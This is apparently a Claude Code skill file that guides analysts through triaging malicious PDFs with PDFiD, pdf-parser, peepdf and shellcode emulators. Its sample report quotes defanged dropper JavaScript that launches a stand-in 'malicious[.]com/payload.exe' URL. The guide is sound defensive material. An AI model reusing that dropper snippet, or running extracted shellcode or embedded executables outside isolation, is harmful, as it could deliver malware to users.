Asi analyzing-pdf-malware-with-pdfid
install
source · Clone the upstream repo
git clone https://github.com/plurigrid/asi
Claude Code · Install into ~/.claude/skills/
T=$(mktemp -d) && git clone --depth=1 https://github.com/plurigrid/asi "$T" && mkdir -p ~/.claude/skills && cp -r "$T/plugins/asi/skills/analyzing-pdf-malware-with-pdfid" ~/.claude/skills/plurigrid-asi-analyzing-pdf-malware-with-pdfid && rm -rf "$T"
manifest:
plugins/asi/skills/analyzing-pdf-malware-with-pdfid/SKILL.mdsource content
Analyzing PDF Malware with PDFiD
When to Use
- A suspicious PDF attachment has been flagged by email security or reported by a user
- You need to determine if a PDF contains embedded JavaScript, shellcode, or exploit code
- Triaging PDF documents before opening them in a sandbox or analysis environment
- Extracting embedded executables, scripts, or URLs from malicious PDF objects
- Analyzing PDF exploit kits targeting Adobe Reader or other PDF viewer vulnerabilities
Do not use for analyzing the rendered visual content of a PDF; this is for structural analysis of the PDF file format for malicious objects.
Prerequisites
- Python 3.8+ with Didier Stevens' PDF tools installed (
)pip install pdfid pdf-parser - peepdf installed for interactive PDF analysis (
)pip install peepdf - pdftotext from poppler-utils for extracting text content safely
- YARA with PDF-specific rules for malware family identification
- Isolated analysis VM without a PDF reader installed (prevent accidental opening)
- CyberChef for decoding embedded Base64, hex, or deflate streams
Workflow
Step 1: Initial Triage with PDFiD
Scan the PDF for suspicious keywords and structures:
# Run PDFiD to identify suspicious elements pdfid suspect.pdf # Expected output analysis: # /JS - JavaScript (HIGH risk) # /JavaScript - JavaScript object (HIGH risk) # /AA - Auto-Action triggered on open (HIGH risk) # /OpenAction - Action on document open (HIGH risk) # /Launch - Launch external application (HIGH risk) # /EmbeddedFile - Embedded file (MEDIUM risk) # /RichMedia - Flash content (MEDIUM risk) # /ObjStm - Object stream (used for obfuscation) # /URI - URL reference (contextual risk) # /AcroForm - Interactive form (MEDIUM risk) # Run with extra detail pdfid -e suspect.pdf # Run with disarming (rename suspicious keywords) pdfid -d suspect.pdf
PDFiD Risk Assessment: ━━━━━━━━━━━━━━━━━━━━━ HIGH RISK indicators (any count > 0): /JS, /JavaScript -> Embedded JavaScript code /AA -> Automatic Action (triggers without user interaction) /OpenAction -> Code runs when document is opened /Launch -> Can launch external executables /JBIG2Decode -> Associated with CVE-2009-0658 exploit MEDIUM RISK indicators: /EmbeddedFile -> Contains embedded files (could be EXE/DLL) /RichMedia -> Flash/multimedia (Flash exploits) /AcroForm -> Form with possible submit action /XFA -> XML Forms Architecture (complex attack surface) LOW RISK indicators: /ObjStm -> Object streams (obfuscation technique) /URI -> External URL references /Page -> Number of pages (context only)
Step 2: Parse PDF Structure with pdf-parser
Examine suspicious objects identified by PDFiD:
# List all objects referencing JavaScript pdf-parser --search "/JavaScript" suspect.pdf pdf-parser --search "/JS" suspect.pdf # List all objects with OpenAction pdf-parser --search "/OpenAction" suspect.pdf # Extract a specific object by ID (example: object 5) pdf-parser --object 5 suspect.pdf # Extract and decompress stream content pdf-parser --object 5 --filter --raw suspect.pdf # Search for embedded files pdf-parser --search "/EmbeddedFile" suspect.pdf # List all objects with their types pdf-parser --stats suspect.pdf
Step 3: Extract and Analyze Embedded JavaScript
Pull out JavaScript code from PDF objects:
# Extract JavaScript using pdf-parser pdf-parser --search "/JS" --raw --filter suspect.pdf > extracted_js.txt # Alternative: Use peepdf for interactive JavaScript extraction peepdf -f -i suspect.pdf << 'EOF' js_analyse EOF # peepdf interactive commands for JS analysis: # js_analyse - Extract and show all JavaScript code # js_beautify - Format extracted JavaScript # js_eval <object> - Evaluate JavaScript in sandboxed environment # object <id> - Display object content # rawobject <id> - Display raw object bytes # stream <id> - Display decompressed stream # offsets - Show object offsets in file
# Python script for comprehensive PDF JavaScript extraction import subprocess import re # Extract all streams and search for JavaScript result = subprocess.run( ["pdf-parser", "--stats", "suspect.pdf"], capture_output=True, text=True ) # Find object IDs containing JavaScript references js_objects = [] for line in result.stdout.split('\n'): if '/JavaScript' in line or '/JS' in line: obj_id = re.search(r'obj (\d+)', line) if obj_id: js_objects.append(obj_id.group(1)) # Extract each JavaScript-containing object for obj_id in js_objects: result = subprocess.run( ["pdf-parser", "--object", obj_id, "--filter", "--raw", "suspect.pdf"], capture_output=True, text=True ) print(f"\n=== Object {obj_id} ===") print(result.stdout[:2000])
Step 4: Analyze Embedded Shellcode
Extract and examine shellcode from PDF exploits:
# Extract raw stream data for shellcode analysis pdf-parser --object 7 --filter --raw --dump shellcode.bin suspect.pdf # Analyze shellcode with scdbg (shellcode debugger) scdbg /f shellcode.bin # Alternative: Use speakeasy for shellcode emulation python3 -c " import speakeasy se = speakeasy.Speakeasy() sc_addr = se.load_shellcode('shellcode.bin', arch='x86') se.run_shellcode(sc_addr, count=1000) # Review API calls made by shellcode for event in se.get_report()['api_calls']: print(f\"{event['api']}: {event['args']}\") " # Use CyberChef to decode hex/base64 encoded shellcode # Input: Extracted stream data # Recipe: From Hex -> Disassemble x86
Step 5: Extract Embedded Files and URLs
Pull out embedded executables and linked resources:
# Extract embedded files from PDF import subprocess import hashlib # Find embedded file objects result = subprocess.run( ["pdf-parser", "--search", "/EmbeddedFile", "--raw", "--filter", "suspect.pdf"], capture_output=True ) # Extract embedded PE files by searching for MZ header with open("suspect.pdf", "rb") as f: data = f.read() # Search for embedded PE files offset = 0 while True: pos = data.find(b'MZ', offset) if pos == -1: break # Verify PE signature if pos + 0x3C < len(data): pe_offset = int.from_bytes(data[pos+0x3C:pos+0x40], 'little') if pos + pe_offset + 2 < len(data) and data[pos+pe_offset:pos+pe_offset+2] == b'PE': print(f"Embedded PE found at offset 0x{pos:X}") # Extract (estimate size or use PE header) embedded = data[pos:pos+100000] # Initial extraction sha256 = hashlib.sha256(embedded).hexdigest() with open(f"embedded_{pos:X}.exe", "wb") as out: out.write(embedded) print(f" SHA-256: {sha256}") offset = pos + 1 # Extract URLs from PDF result = subprocess.run( ["pdf-parser", "--search", "/URI", "--raw", "suspect.pdf"], capture_output=True, text=True ) urls = re.findall(r'(https?://[^\s<>"]+)', result.stdout) for url in set(urls): print(f"URL: {url}")
Step 6: Generate Analysis Report
Document all findings from the PDF analysis:
Analysis should cover: - PDFiD triage results (suspicious keyword counts) - PDF structure anomalies (object streams, cross-reference issues) - Extracted JavaScript code (deobfuscated if needed) - Shellcode analysis results (API calls, network indicators) - Embedded files extracted with hashes - URLs and external references - CVE identification if a known exploit is detected - YARA rule matches against known PDF malware families
Key Concepts
| Term | Definition |
|---|---|
| PDF Object | Basic building block of a PDF file; objects can contain streams (compressed data), dictionaries, arrays, and references to other objects |
| OpenAction | PDF dictionary entry specifying an action to execute when the document is opened; commonly used to trigger JavaScript exploits |
| PDF Stream | Compressed data within a PDF object that can contain JavaScript, images, embedded files, or shellcode; typically FlateDecode compressed |
| FlateDecode | Zlib/deflate compression filter applied to PDF streams; must be decompressed to analyze contents |
| ObjStm (Object Stream) | PDF feature storing multiple objects within a single compressed stream; used by malware to hide suspicious objects from simple parsers |
| JBIG2 | Image compression standard in PDFs; historical source of exploits (CVE-2009-0658, CVE-2021-30860 FORCEDENTRY) |
| PDF JavaScript API | Adobe-specific JavaScript extensions available in PDF documents for form manipulation, network access, and OS interaction |
Tools & Systems
- PDFiD: Didier Stevens' tool for scanning PDF documents for suspicious keywords and structures without parsing the full document
- pdf-parser: Companion tool to PDFiD for detailed PDF object extraction, stream decompression, and content analysis
- peepdf: Python-based PDF analysis tool providing interactive shell for object inspection and JavaScript extraction
- QPDF: PDF transformation tool for linearizing, decrypting, and restructuring PDFs for easier analysis
- scdbg: Shellcode analysis tool that emulates x86 shellcode execution and logs API calls
Common Scenarios
Scenario: Triaging a Phishing PDF with Embedded JavaScript
Context: Email gateway flagged a PDF attachment with suspicious JavaScript indicators. The security team needs to determine if it contains an exploit or a social engineering redirect.
Approach:
- Run PDFiD to confirm /JS, /JavaScript, and /OpenAction presence and counts
- Use pdf-parser to extract the OpenAction object and follow its reference chain
- Extract the JavaScript code from the referenced stream object (apply FlateDecode filter)
- Deobfuscate the JavaScript (decode hex strings, resolve eval chains)
- Determine if the script exploits a PDF reader vulnerability (check for heap spray, ROP chains) or performs a redirect
- Extract all URLs, IPs, and embedded files as IOCs
- Classify the sample: exploit (specific CVE) or social engineering (redirect/phishing)
Pitfalls:
- Opening the PDF in a standard reader instead of analyzing it with command-line tools
- Missing JavaScript hidden inside Object Streams (/ObjStm) that PDFiD detects but simple parsers miss
- Not decompressing streams before analysis (FlateDecode, ASCIIHexDecode, ASCII85Decode filters)
- Assuming the absence of /JS means no JavaScript; code can be embedded in form fields (/AcroForm with /XFA)
Output Format
PDF MALWARE ANALYSIS REPORT ============================== File: invoice_2025.pdf SHA-256: e3b0c44298fc1c149afbf4c8996fb924... File Size: 45,312 bytes PDF Version: 1.7 PDFID TRIAGE /JS: 1 [HIGH RISK] /JavaScript: 1 [HIGH RISK] /OpenAction: 1 [HIGH RISK] /EmbeddedFile: 0 /Launch: 0 /URI: 2 /Page: 1 /ObjStm: 1 [OBFUSCATION] SUSPICIOUS OBJECTS Object 5: /OpenAction -> references Object 8 Object 8: /JavaScript stream (FlateDecode, 2,847 bytes decompressed) Object 12: /ObjStm containing objects 15-18 EXTRACTED JAVASCRIPT Layer 1: eval(unescape("%68%65%6C%6C%6F")) Layer 2: var url = "hxxp://malicious[.]com/payload.exe"; app.launchURL(url, true); // Social engineering redirect, not exploit EXTRACTED IOCs URLs: hxxp://malicious[.]com/payload.exe hxxps://fake-login[.]com/adobe/verify Domains: malicious[.]com, fake-login[.]com CLASSIFICATION Type: Social Engineering (URL redirect) CVE: None (no exploit code detected) Risk: HIGH (downloads executable payload) Family: Generic PDF Dropper